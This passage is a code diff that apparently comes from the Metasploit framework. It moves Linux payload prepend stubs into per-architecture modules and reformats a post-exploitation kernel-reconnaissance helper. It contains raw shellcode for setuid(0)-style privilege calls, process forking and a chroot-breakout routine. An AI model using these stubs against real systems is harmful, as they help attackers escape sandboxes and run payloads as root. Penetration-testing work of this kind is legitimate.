-        # setresgid(0, 0, 0)
-        pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        pre << "\x48\x89\xfe"         #    mov     rsi,rdi                   #
-        pre << "\x6a\x77"             #    push    0x77                      #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-      end
-
-      if (datastore['PrependSetregid'])
-        # setregid(0, 0)
-        pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        pre << "\x48\x89\xfe"         #    mov     rsi,rdi                   #
-        pre << "\x48\x89\xf2"         #    mov     rdx,rsi                   #
-        pre << "\x6a\x72"             #    push    0x72                      #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-      end
-
-      if (datastore['PrependSetgid'])
-        # setgid(0)
-        pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        pre << "\x6a\x6a"             #    push    0x6a                      #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-      end
-
-      if (datastore['PrependChrootBreak'])
-
-        # setreuid(0, 0)
-        pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        pre << "\x48\x89\xfe"         #    mov     rsi,rdi                   #
-        pre << "\x48\x89\xf8"         #    mov     rax,rdi                   #
-        pre << "\xb0\x71"             #    mov     al,0x71                   #
-        pre << "\x0f\x05"             #    syscall                           #
-
-        # generate temp dir name
-        pre << "\x48\xbf"             #    mov     rdi,                      #
-        pre << Rex::Text.rand_text_alpha(8)  #         random                #
-        pre << "\x56"                 #    push    rsi                       #
-        pre << "\x57"                 #    push    rdi                       #
-
-        # mkdir(random,0755)
-        pre << "\x48\x89\xe7"         #    mov     rdi,rsp                   #
-        pre << "\x66\xbe\xed\x01"     #    mov     si,0755                   #
-        pre << "\x6a\x53"             #    push    0x53                      #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-
-        # chroot(random)
-        pre << "\x48\x31\xd2"         #    xor     rdx,rdx                   #
-        pre << "\xb2\xa1"             #    mov     dl,0xa1                   #
-        pre << "\x48\x89\xd0"         #    mov     rax,rdx                   #
-        pre << "\x0f\x05"             #    syscall                           #
-
-        # build .. (ptr in rdi )
-        pre << "\x66\xbe\x2e\x2e"     #    mov     si,0x2e2e                 #
-        pre << "\x56"                 #    push    rsi                       #
-        pre << "\x48\x89\xe7"         #    mov     rdi,rsp                   #
-
-        # loop chdir(..) 69 times
-        # syscall tend to modify rcx can't use loop...
-        pre << "\x6a\x45"             #    push    0x45                      #
-        pre << "\x5b"                 #    pop     rbx                       #
-        pre << "\x6a\x50"             #    push    0x50                      #
-        pre << "\x58"                 #    pop     rax                       #
-        pre << "\x0f\x05"             #    syscall                           #
-        pre << "\xfe\xcb"             #    dec     bl                        #
-        pre << "\x75\xf7"             #    jnz     -7                        #
-
-        # chroot (.) (which should be /)
-        pre << "\x6a\x2e"             #    push    .  (0x2e)                 #
-        pre << "\x48\x89\xe7"         #    mov     rdi,rsp                   #
-        pre << "\x48\x89\xd0"         #    mov     rax,rdx                   #
-        pre << "\x0f\x05"             #    syscall                           #
-
-      end
-
-      # Append exit(0)
-
-      if (datastore['AppendExit'])
-        app << "\x48\x31\xff"         #    xor     rdi,rdi                   #
-        app << "\x6a\x3c"             #    push    0x3c                      #
-        app << "\x58"                 #    pop     rax                       #
-        app << "\x0f\x05"             #    syscall                           #
-      end
-
-    elsif (test_arch.include?(ARCH_ARMLE))
-
-      if (datastore['PrependSetuid'])
-        # setuid(0)
-        pre << "\x00\x00\x20\xe0"     #    eor r0, r0, r0                    #
-        pre << "\x17\x70\xa0\xe3"     #    mov r7, #23                       #
-        pre << "\x00\x00\x00\xef"     #    svc                               #
-      end
-
-      if (datastore['PrependSetresuid'])
-        # setresuid(ruid=0, euid=0, suid=0)
-        pre << "\x00\x00\x20\xe0"     #    eor r0, r0, r0                    #
-        pre << "\x01\x10\x21\xe0"     #    eor r1, r1, r1                    #
-        pre << "\x02\x20\x22\xe0"     #    eor r2, r2, r2                    #
-        pre << "\xa4\x70\xa0\xe3"     #    mov r7, #0xa4                     #
-        pre << "\x00\x00\x00\xef"     #    svc                               #
-      end
-    end
-
-    return (pre + buf + app)
-  end
-
-
 end
@@ -0,0 +1,42 @@
+#
+# Linux aarch64 prepends
+#
+module Msf::Payload::Linux::Aarch64::Prepends
+  include Msf::Payload::Linux::Prepends
+
+  def prepends_order
+    %w[PrependSetresuid PrependSetreuid PrependSetuid]
+  end
+
+  def appends_order
+    %w[]
+  end
+
+  def prepends_map
+    {
+      # 'PrependFork' =>  "",
+
+      # setuid(0)
+      'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov   x0, xzr
+        "\x48\x12\x80\xd2" +  # mov   x8, #0x92
+        "\x01\x00\x00\xd4",   # svc   0x0
+
+      # setreuid(0, 0)
+      'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov   x0, xzr
+        "\xe1\x03\x1f\xaa" +  # mov   x1, xzr
+        "\x28\x12\x80\xd2" +  # mov   x8, #0x91
+        "\x01\x00\x00\xd4",   # svc   0x0
+
+      # setresuid(0, 0, 0)
+      'PrependSetresuid' => "\xe0\x03\x1f\xaa" + # mov   x0, xzr
+        "\xe1\x03\x1f\xaa" +  # mov   x1, xzr
+        "\xe2\x03\x1f\xaa" +  # mov   x2, xzr
+        "\x68\x12\x80\xd2" +  # mov   x8, #0x93
+        "\x01\x00\x00\xd4"    # svc   0x0
+    }
+  end
+
+  def appends_map
+    {}
+  end
+end
@@ -0,0 +1,37 @@
+#
+# Linux armle prepends
+#
+module Msf::Payload::Linux::Armle::Prepends
+  include Msf::Payload::Linux::Prepends
+
+  def prepends_order
+    %w[PrependSetresuid PrependSetuid]
+  end
+
+  def appends_order
+    %w[]
+  end
+
+  def prepends_map
+    {
+      # 'PrependFork' =>  "",
+
+      #
+      # setuid(0)
+      'PrependSetuid' => "\x00\x00\x20\xe0" + #    eor r0, r0, r0                    #
+        "\x17\x70\xa0\xe3" + #    mov r7, #23                       #
+        "\x00\x00\x00\xef", #    svc                               #
+
+      # setresuid(0, 0, 0)
+      'PrependSetresuid' => "\x00\x00\x20\xe0" + #    eor r0, r0, r0                    #
+        "\x01\x10\x21\xe0" + #    eor r1, r1, r1                    #
+        "\x02\x20\x22\xe0" + #    eor r2, r2, r2                    #
+        "\xa4\x70\xa0\xe3" + #    mov r7, #0xa4                     #
+        "\x00\x00\x00\xef" #    svc                               #
+    }
+  end
+
+  def appends_map
+    {}
+  end
+end
@@ -13,7 +13,7 @@ module Msf
 module Payload::Linux::BindTcp

  include Msf::Payload::TransportConfig
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
  include Msf::Payload::Linux::SendUUID

  #
@@ -0,0 +1,75 @@
+#
+# Linux ppc prepends
+#
+module Msf::Payload::Linux::Ppc::Prepends
+  include Msf::Payload::Linux::Prepends
+
+  def prepends_order
+    %w[PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid]
+  end
+
+  def appends_order
+    %w[AppendExit]
+  end
+
+  def prepends_map
+    {
+      # 'PrependFork' =>  "",
+
+      # setresuid(0, 0, 0)
+      'PrependSetresuid' => "\x3b\xe0\x01\xff" + #   li      r31,511                    #
+        "\x7c\xa5\x2a\x78" + #   xor     r5,r5,r5                   #
+        "\x7c\x84\x22\x78" + #   xor     r4,r4,r4                   #
+        "\x7c\x63\x1a\x78" + #   xor     r3,r3,r3                   #
+        "\x38\x1f\xfe\xa5" + #   addi    r0,r31,-347                #
+        "\x44\xff\xff\x02", #   sc                                 #
+
+      # setreuid(0, 0)
+      'PrependSetreuid' => "\x3b\xe0\x01\xff" + #   li      r31,511                    #
+        "\x7c\x84\x22\x78" + #   xor     r4,r4,r4                   #
+        "\x7c\x63\x1a\x78" + #   xor     r3,r3,r3                   #
+        "\x38\x1f\xfe\x47" + #   addi    r0,r31,-441                #
+        "\x44\xff\xff\x02", #   sc                                 #
+
+      # setuid(0)
+      'PrependSetuid' => "\x3b\xe0\x01\xff" + #   li      r31,511                    #
+        "\x7c\x63\x1a\x78" + #   xor     r3,r3,r3                   #
+        "\x38\x1f\xfe\x18" + #   addi    r0,r31,-488                #
+        "\x44\xff\xff\x02", #   sc                                 #
+
+      # setresgid(0, 0, 0)
+      'PrependSetresgid' => "\x3b\xe0\x01\xff" + #   li      r31,511                    #
+        "\x7c\xa5\x2a\x78" + #   xor     r5,r5,r5                   #
+        "\x7c\x84\x22\x78" + #   xor     r4,r4,r4                   #
+        "\x7c\x63\x1a\x78" + #   xor     r3,r3,r3                   #
+        "\x38\x1f\xfe\xab" + #   addi    r0,r31,-341                #
+        "\x44\xff\xff\x02", #   sc                                 #
+
+      # setregid(0, 0)
+      'PrependSetregid' => "\x3b\xe0\x01\xff" + #   li      r31,511                    #
+        "\x7c\x84\x22\x78" + #   xor     r4,r4,r4                   #
+        "\x7c\x63\x1a\x78" + #   xor     r3,r3,r3                   #
+        "\x38\x1f\xfe\x48" + #   addi    r0,r31,-440                #
+        "\x44\xff\xff\x02", #   sc                                 #
+
+      # setgid(0)
+      'PrependSetgid' => "\x3b\xe0\x01\xff" + #   li      r31,511                    #
+        "\x7c\x63\x1a\x78" + #   xor     r3,r3,r3                   #
+        "\x38\x1f\xfe\x2f" + #   addi    r0,r31,-465                #
+        "\x44\xff\xff\x02" #   sc                                 #
+
+      # setreuid(0, 0) = break chroot
+      # 'PrependChrootBreak' =>
+    }
+  end
+
+  def appends_map
+    {
+      # exit(0)
+      'AppendExit' => "\x3b\xe0\x01\xff" + #   li      r31,511                    #
+        "\x7c\x63\x1a\x78" + #   xor     r3,r3,r3                   #
+        "\x38\x1f\xfe\x02" + #   addi    r0,r31,-510                #
+        "\x44\xff\xff\x02" #   sc                                 #
+    }
+  end
+end
@@ -0,0 +1,45 @@
+#
+# Linux Preprends shared logic.
+#
+module Msf::Payload::Linux::Prepends
+  def initialize(info)
+    super(info)
+    register_prepend_options
+  end
+
+  def register_prepend_options
+    all_options = {
+      'PrependFork' => [false, 'Prepend a stub that starts the payload in its own process via fork', 'false'],
+      'PrependSetresuid' => [false, 'Prepend a stub that executes the setresuid(0, 0, 0) system call', 'false'],
+      'PrependSetreuid' => [false, 'Prepend a stub that executes the setreuid(0, 0) system call', 'false'],
+      'PrependSetuid' => [false, 'Prepend a stub that executes the setuid(0) system call', 'false'],
+      'PrependSetresgid' => [false, 'Prepend a stub that executes the setresgid(0, 0, 0) system call', 'false'],
+      'PrependSetregid' => [false, 'Prepend a stub that executes the setregid(0, 0) system call', 'false'],
+      'PrependSetgid' => [false, 'Prepend a stub that executes the setgid(0) system call', 'false'],
+      'PrependChrootBreak' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'],
+      'AppendExit' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false']
+    }
+    avaiable_options = []
+    for prepend in prepends_order
+      avaiable_options.append(Msf::OptBool.new(prepend, all_options.fetch(prepend)))
+    end
+    for append in appends_order
+      avaiable_options.append(Msf::OptBool.new(append, all_options.fetch(append)))
+    end
+    register_advanced_options(avaiable_options, Msf::Payload::Linux)
+  end
+
+  def apply_prepends(buf)
+    pre = ''
+    app = ''
+    for name in prepends_order.each
+      pre << prepends_map.fetch(name) if datastore[name]
+    end
+    for name in appends_order.each
+      app << appends_map.fetch(name) if datastore[name]
+    end
+    pre.force_encoding('ASCII-8BIT') +
+      buf.force_encoding('ASCII-8BIT') +
+      app.force_encoding('ASCII-8BIT')
+  end
+end
@@ -12,7 +12,7 @@ module Msf
 module Payload::Linux::ReverseTcp_x86

  include Msf::Payload::TransportConfig
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
  include Msf::Payload::Linux::SendUUID

  #
@@ -0,0 +1,132 @@
+#
+# Linux x64 Prepends file
+#
+module Msf::Payload::Linux::X64::Prepends
+  include Msf::Payload::Linux::Prepends
+  def prepends_order
+    %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid]
+  end
+
+  def appends_order
+    %w[]
+  end
+
+  def prepends_map
+    {
+      'PrependFork' => "\x6a\x39" + #    push    57        ; __NR_fork     #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05" + #    syscall                           #
+        "\x48\x85\xc0" + #    test    rax,rax                   #
+        "\x74\x08" + #    jz      loc_0012                  #
+        #  loc_000a:                           #
+        "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x6a\x3c" + #    push    60        ; __NR_exit     #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05" + #    syscall                           #
+        #  loc_0012:                           #
+        "\x04\x70" + #    add     al, 112   ; __NR_setsid   #
+        "\x0f\x05" + #    syscall                           #
+        "\x6a\x39" + #    push    57        ; __NR_fork     #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05" + #    syscall                           #
+        "\x48\x85\xc0" + #    test    rax,rax                   #
+        "\x75\xea", #    jnz     loc_000a                  #
+
+      # setresuid(0, 0, 0)
+      'PrependSetresuid' => "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x48\x89\xfe" + #    mov     rsi,rdi                   #
+        "\x6a\x75" + #    push    0x75                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05", #    syscall                           #
+
+      # setreuid(0, 0)
+      'PrependSetreuid' => "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x48\x89\xfe" + #    mov     rsi,rdi                   #
+        "\x48\x89\xf2" + #    mov     rdx,rsi                   #
+        "\x6a\x71" + #    push    0x71                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05", #    syscall                           #
+
+      # setuid(0)
+      'PrependSetuid' => "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x6a\x69" + #    push    0x69                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05", #    syscall                           #
+
+      # setresgid(0, 0, 0)
+      'PrependSetresgid' => "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x48\x89\xfe" + #    mov     rsi,rdi                   #
+        "\x6a\x77" + #    push    0x77                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05", #    syscall                           #
+
+      # setregid(0, 0)
+      'PrependSetregid' => "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x48\x89\xfe" + #    mov     rsi,rdi                   #
+        "\x48\x89\xf2" + #    mov     rdx,rsi                   #
+        "\x6a\x72" + #    push    0x72                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05", #    syscall                           #
+
+      # setgid(0)
+      'PrependSetgid' => "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x6a\x6a" + #    push    0x6a                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05", #    syscall                           #
+
+      # setreuid(0, 0) + break chroot
+      'PrependChrootBreak' => "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x48\x89\xfe" + #    mov     rsi,rdi                   #
+        "\x48\x89\xf8" + #    mov     rax,rdi                   #
+        "\xb0\x71" + #    mov     al,0x71                   #
+        "\x0f\x05" + #    syscall                           #
+        # generate temp dir name
+        "\x48\xbf#{Rex::Text.rand_text_alpha(8)}" + #    mov     rdi, <random 8 bytes alpha>  #
+        "\x56" + #    push    rsi                       #
+        "\x57" + #    push    rdi                       #
+        # mkdir(random,0755)
+        "\x48\x89\xe7" + #    mov     rdi,rsp                   #
+        "\x66\xbe\xed\x01" + #    mov     si,0755                   #
+        "\x6a\x53" + #    push    0x53                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05" + #    syscall                           #
+
+        # chroot(random)
+        "\x48\x31\xd2" + #    xor     rdx,rdx                   #
+        "\xb2\xa1" + #    mov     dl,0xa1                   #
+        "\x48\x89\xd0" + #    mov     rax,rdx                   #
+        "\x0f\x05" + #    syscall                           #
+
+        # build .. (ptr in rdi )
+        "\x66\xbe\x2e\x2e" + #    mov     si,0x2e2e                 #
+        "\x56" + #    push    rsi                       #
+        "\x48\x89\xe7" + #    mov     rdi,rsp                   #
+
+        # loop chdir(..) 69 times
+        # syscall tend to modify rcx can't use loop...
+        "\x6a\x45" + #    push    0x45                      #
+        "\x5b" + #    pop     rbx                       #
+        "\x6a\x50" + #    push    0x50                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05" + #    syscall                           #
+        "\xfe\xcb" + #    dec     bl                        #
+        "\x75\xf7" + #    jnz     -7                        #
+
+        # chroot (.) (which should be /)
+        "\x6a\x2e" + #    push    .  (0x2e)                 #
+        "\x48\x89\xe7" + #    mov     rdi,rsp                   #
+        "\x48\x89\xd0" + #    mov     rax,rdx                   #
+        "\x0f\x05"
+    } #    syscall                           #
+  end
+
+  def appends_map
+    {
+      # exit(0)
+      'AppendExit' => "\x48\x31\xff" + #    xor     rdi,rdi                   #
+        "\x6a\x3c" + #    push    0x3c                      #
+        "\x58" + #    pop     rax                       #
+        "\x0f\x05" #    syscall                           #
+    }
+  end
+end
@@ -9,10 +9,10 @@ module Msf
 #
 ###

-module Payload::Linux::ReverseSctp_x64
+module Payload::Linux::X64::ReverseSctp

  include Msf::Payload::TransportConfig
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends

  #
  # Generate the first stage
@@ -9,10 +9,10 @@ module Msf
 #
 ###

-module Payload::Linux::ReverseTcp_x64
+module Payload::Linux::X64::ReverseTcp

  include Msf::Payload::TransportConfig
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends

  #
  # Generate the first stage
@@ -0,0 +1,119 @@
+#
+# Linux x86 prepends
+#
+module Msf::Payload::Linux::X86::Prepends
+  include Msf::Payload::Linux::Prepends
+  def prepends_order
+    %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak]
+  end
+
+  def appends_order
+    %w[AppendExit]
+  end
+
+  def prepends_map
+    {
+      'PrependFork' => "\x6a\x02" + #   pushb   $0x2                       #
+        "\x58" + #   popl    %eax                       #
+        "\xcd\x80" + #   int     $0x80       ; fork         #
+        "\x85\xc0" + #   test    %eax,%eax                  #
+        "\x74\x06" + #   jz      loc_000f                   #
+        # loc_0009:
+        "\x31\xc0" + #   xor     %eax,%eax                  #
+        "\xb0\x01" + #   movb    $0x1,%al                   #
+        "\xcd\x80" + #   int     $0x80       ; exit         #
+        # loc_000f:
+        "\xb0\x42" + #   movb    %0x42,%al                  #
+        "\xcd\x80" + #   int     $0x80       ; setsid       #
+        "\x6a\x02" + #   pushb   $0x2                       #
+        "\x58" + #   popl    %eax                       #
+        "\xcd\x80" + #   int     $0x80       ; fork         #
+        "\x85\xc0" + #   test    %eax,%eax                  #
+        "\x75\xed", #   jnz     loc_0009                   #
+
+      # setresuid(0, 0, 0)
+      'PrependSetresuid' => "\x31\xc9" + #   xorl    %ecx,%ecx                  #
+        "\x31\xdb" + #   xorl    %ebx,%ebx                  #
+        "\xf7\xe3" + #   mull    %ebx                       #
+        "\xb0\xa4" + #   movb    $0xa4,%al                  #
+        "\xcd\x80", #   int     $0x80                      #
+
+      # setreuid(0, 0)
+      'PrependSetreuid' => "\x31\xc9" + #   xorl    %ecx,%ecx                  #
+        "\x31\xdb" + #   xorl    %ebx,%ebx                  #
+        "\x6a\x46" + #   pushl   $0x46                      #
+        "\x58" + #   popl    %eax                       #
+        "\xcd\x80", #   int     $0x80                      #
+
+      # setuid(0)
+      'PrependSetuid' => "\x31\xdb" + #   xorl    %ebx,%ebx                  #
+        "\x6a\x17" + #   pushl   $0x17                      #
+        "\x58" + #   popl    %eax                       #
+        "\xcd\x80", #   int     $0x80                      #
+
+      # setresgid(0, 0, 0)
+      'PrependSetresgid' => "\x31\xc9" + #   xorl    %ecx,%ecx                  #
+        "\x31\xdb" + #   xorl    %ebx,%ebx                  #
+        "\xf7\xe3" + #   mull    %ebx                       #
+        "\xb0\xaa" + #   movb    $0xaa,%al                  #
+        "\xcd\x80", #   int     $0x80                      #
+
+      # setregid(0, 0)
+      'PrependSetregid' => "\x31\xc9" + #   xorl    %ecx,%ecx                  #
+        "\x31\xdb" + #   xorl    %ebx,%ebx                  #
+        "\x6a\x47" + #   pushl   $0x47                      #
+        "\x58" + #   popl    %eax                       #
+        "\xcd\x80", #   int     $0x80                      #
+
+      # setgid(0)
+      'PrependSetgid' => "\x31\xdb" + #   xorl    %ebx,%ebx                  #
+        "\x6a\x2e" + #   pushl   $0x2e                      #
+        "\x58" + #   popl    %eax                       #
+        "\xcd\x80", #   int     $0x80                      #
+
+      # setreuid(0, 0) = break chroot
+      'PrependChrootBreak' => "\x31\xc9" + #   xorl    %ecx,%ecx                  #
+        "\x31\xdb" + #   xorl    %ebx,%ebx                  #
+        "\x6a\x46" + #   pushl   $0x46                      #
+        "\x58" + #   popl    %eax                       #
+        "\xcd\x80" + #   int     $0x80                      #
+        "\x6a\x3d" + #   pushl  $0x3d                       #
+        # build dir str (ptr in ebx)
+        "\x89\xe3" + #   movl   %esp,%ebx                   #
+        # mkdir(dir)
+        "\x6a\x27" + #   pushl  $0x27                       #
+        "\x58" + #   popl   %eax                        #
+        "\xcd\x80" + #   int     $0x80                      #
+        # chroot(dir)
+        "\x89\xd9" + #   movl   %ebx,%ecx                   #
+        "\x58" + #   popl   %eax                        #
+        "\xcd\x80" + #   int     $0x80                      #
+        # build ".." str (ptr in ebx)
+        "\x31\xc0" + #   xorl   %eax,%eax                   #
+        "\x50" + #   pushl  %eax                        #
+        "\x66\x68\x2e\x2e" + #   pushw  $0x2e2e                     #
+        "\x89\xe3" + #   movl   %esp,%ebx                   #
+        # loop changing dir
+        "\x6a\x3d" + #   pushl  $0x1e                       #
+        "\x59" + #   popl   %ecx                        #
+        "\xb0\x0c" + #   movb   $0xc,%al                    #
+        "\xcd\x80" + #   int     $0x80                      #
+        "\xe2\xfa" + #   loop   -6                          #
+        # final chroot
+        "\x6a\x3d" + #   pushl  $0x3d                       #
+        "\x89\xd9" + #   movl   %ebx,%ecx                   #
+        "\x58" + #   popl   %eax                        #
+        "\xcd\x80" #   int     $0x80                      #
+    }
+  end
+
+  def appends_map
+    {
+      # exit(0)
+      'AppendExit' => "\x31\xdb" + #   xorl    %ebx,%ebx                 #
+        "\x6a\x01" + #   pushl   $0x01                     #
+        "\x58" + #   popl    %eax                      #
+        "\xcd\x80" #   int     $0x80                     #
+    }
+  end
+end
@@ -1,331 +1,338 @@
 # -*- coding: binary -*-

 module Msf
-class Post
-module Linux
-module Kernel
-  include ::Msf::Post::Common
-  include Msf::Post::File
-  #
-  # Returns uname output
-  #
-  # @return [String]
-  #
-  def uname(opts='-a')
-    cmd_exec("uname #{opts}").to_s.strip
-  rescue
-    raise "Failed to run uname #{opts}"
-  end
+  class Post
+    module Linux
+      module Kernel
+        include ::Msf::Post::Common
+        include Msf::Post::File
+        #
+        # Returns uname output
+        #
+        # @return [String]
+        #
+        def uname(opts = '-a')
+          cmd_exec("uname #{opts}").to_s.strip
+        rescue StandardError
+          raise "Failed to run uname #{opts}"
+        end

-  #
-  # Returns the kernel release
-  #
-  # @return [String]
-  #
-  def kernel_release
-    uname('-r')
-  end
+        #
+        # Returns the kernel release
+        #
+        # @return [String]
+        #
+        def kernel_release
+          uname('-r')
+        end

-  #
-  # Returns the kernel version
-  #
-  # @return [String]
-  #
-  def kernel_version
-    uname('-v')
-  end
+        #
+        # Returns the kernel version
+        #
+        # @return [String]
+        #
+        def kernel_version
+          uname('-v')
+        end

-  #
-  # Returns the kernel name
-  #
-  # @return [String]
-  #
-  def kernel_name
-    uname('-s')
-  end
+        #
+        # Returns the kernel name
+        #
+        # @return [String]
+        #
+        def kernel_name
+          uname('-s')
+        end

-  #
-  # Returns the kernel hardware
-  #
-  # @return [String]
-  #
-  def kernel_hardware
-    uname('-m')
-  end
+        #
+        # Returns the kernel hardware
+        #
+        # @return [String]
+        #
+        def kernel_hardware
+          uname('-m')
+        end

-  #
-  # Returns the kernel hardware architecture
-  # Based on values from https://en.wikipedia.org/wiki/Uname
-  #
-  # @return [String]
-  #
-  def kernel_arch
-    arch = kernel_hardware
-    return ARCH_X64 if arch == 'x86_64' || arch == 'amd64'
-    return ARCH_AARCH64 if arch == 'aarch64' || arch == 'arm64'
-    return ARCH_ARMLE if arch.start_with?'arm'
-    return ARCH_X86 if arch.end_with?'86'
-    return ARCH_PPC if arch == 'ppc'
-    return ARCH_PPC64 if arch == 'ppc64'
-    return ARCH_PPC64LE if arch == 'ppc64le'
-    return ARCH_MIPS if arch == 'mips'
-    return ARCH_MIPS64 if arch == 'mips64'
-    return ARCH_SPARC if arch == 'sparc'
-    return ARCH_RISCV32LE if arch == 'riscv32'
-    return ARCH_RISCV64LE if arch == 'riscv64'
-    return ARCH_LOONGARCH64 if arch == 'loongarch64'
-    arch
-  end
+        #
+        # Returns the kernel hardware architecture
+        # Based on values from https://en.wikipedia.org/wiki/Uname
+        #
+        # @return [String]
+        #
+        def kernel_arch
+          arch = kernel_hardware
+          return ARCH_X64 if arch == 'x86_64' || arch == 'amd64'
+          return ARCH_AARCH64 if arch == 'aarch64' || arch == 'arm64'
+          return ARCH_ARMLE if arch.start_with? 'arm'
+          return ARCH_X86 if arch.end_with? '86'
+          return ARCH_PPC if arch == 'ppc'
+          return ARCH_PPC64 if arch == 'ppc64'
+          return ARCH_PPC64LE if arch == 'ppc64le'
+          return ARCH_MIPS if arch == 'mips'
+          return ARCH_MIPS64 if arch == 'mips64'
+          return ARCH_SPARC if arch == 'sparc'
+          return ARCH_RISCV32LE if arch == 'riscv32'
+          return ARCH_RISCV64LE if arch == 'riscv64'
+          return ARCH_LOONGARCH64 if arch == 'loongarch64'

-  #
-  # Returns the kernel boot config
-  #
-  # @return [Array]
-  #
-  def kernel_config
-    release = kernel_release
-    output = read_file("/boot/config-#{release}").to_s.strip
-    return if output.empty?
-    config = output.split("\n").map(&:strip).reject(&:empty?).reject {|i| i.start_with? '#'}
-    config
-  rescue
-    raise 'Could not retrieve kernel config'
-  end
+          arch
+        end

-  #
-  # Returns the kernel modules
-  #
-  # @return [Array]
-  #
-  def kernel_modules
-    read_file('/proc/modules').to_s.scan(/^[^ ]+/)
-  rescue
-    raise 'Could not determine kernel modules'
-  end
+        #
+        # Returns the kernel boot config
+        #
+        # @return [Array]
+        #
+        def kernel_config
+          release = kernel_release
+          output = read_file("/boot/config-#{release}").to_s.strip
+          return if output.empty?

-  #
-  # Returns a list of CPU flags
-  #
-  # @return [Array]
-  #
-  def cpu_flags
-    cpuinfo = read_file('/proc/cpuinfo').to_s
+          config = output.split("\n").map(&:strip).reject(&:empty?).reject { |i| i.start_with? '#' }
+          config
+        rescue StandardError
+          raise 'Could not retrieve kernel config'
+        end

-    return unless cpuinfo.include? 'flags'
+        #
+        # Returns the kernel modules
+        #
+        # @return [Array]
+        #
+        def kernel_modules
+          read_file('/proc/modules').to_s.scan(/^[^ ]+/)
+        rescue StandardError
+          raise 'Could not determine kernel modules'
+        end

-    cpuinfo.scan(/^flags\s*:(.*)$/).flatten.join(' ').split(/\s/).map(&:strip).reject(&:empty?).uniq
-  rescue
-    raise'Could not retrieve CPU flags'
-  end
+        #
+        # Returns a list of CPU flags
+        #
+        # @return [Array]
+        #
+        def cpu_flags
+          cpuinfo = read_file('/proc/cpuinfo').to_s

-  #
-  # Returns true if kernel and hardware supports Supervisor Mode Access Prevention (SMAP), false if not.
-  #
-  # @return [Boolean]
-  #
-  def smap_enabled?
-    cpu_flags.include? 'smap'
-  rescue
-    raise 'Could not determine SMAP status'
-  end
+          return unless cpuinfo.include? 'flags'

-  #
-  # Returns true if kernel and hardware supports Supervisor Mode Execution Protection (SMEP), false if not.
-  #
-  # @return [Boolean]
-  #
-  def smep_enabled?
-    cpu_flags.include? 'smep'
-  rescue
-    raise 'Could not determine SMEP status'
-  end
+          cpuinfo.scan(/^flags\s*:(.*)$/).flatten.join(' ').split(/\s/).map(&:strip).reject(&:empty?).uniq
+        rescue StandardError
+          raise 'Could not retrieve CPU flags'
+        end

-  #
-  # Returns true if Kernel Address Isolation (KAISER) is enabled
-  #
-  # @return [Boolean]
-  #
-  def kaiser_enabled?
-    cpu_flags.include? 'kaiser'
-  rescue
-    raise 'Could not determine KAISER status'
-  end
+        #
+        # Returns true if kernel and hardware supports Supervisor Mode Access Prevention (SMAP), false if not.
+        #
+        # @return [Boolean]
+        #
+        def smap_enabled?
+          cpu_flags.include? 'smap'
+        rescue StandardError
+          raise 'Could not determine SMAP status'
+        end

-  #
-  # Returns true if Kernel Page-Table Isolation (KPTI) is enabled, false if not.
-  #
-  # @return [Boolean]
-  #
-  def kpti_enabled?
-    cpu_flags.include? 'pti'
-  rescue
-    raise 'Could not determine KPTI status'
-  end
+        #
+        # Returns true if kernel and hardware supports Supervisor Mode Execution Protection (SMEP), false if not.
+        #
+        # @return [Boolean]
+        #
+        def smep_enabled?
+          cpu_flags.include? 'smep'
+        rescue StandardError
+          raise 'Could not determine SMEP status'
+        end

-  #
-  # Returns true if user namespaces are enabled, false if not.
-  #
-  # @return [Boolean]
-  #
-  def userns_enabled?
-    return false if read_file('/proc/sys/user/max_user_namespaces').to_s.strip.eql? '0'
-    return false if read_file('/proc/sys/kernel/unprivileged_userns_clone').to_s.strip.eql? '0'
-    true
-  rescue
-    raise 'Could not determine userns status'
-  end
+        #
+        # Returns true if Kernel Address Isolation (KAISER) is enabled
+        #
+        # @return [Boolean]
+        #
+        def kaiser_enabled?
+          cpu_flags.include? 'kaiser'
+        rescue StandardError
+          raise 'Could not determine KAISER status'
+        end

-  #
-  # Returns true if Address Space Layout Randomization (ASLR) is enabled
-  #
-  # @return [Boolean]
-  #
-  def aslr_enabled?
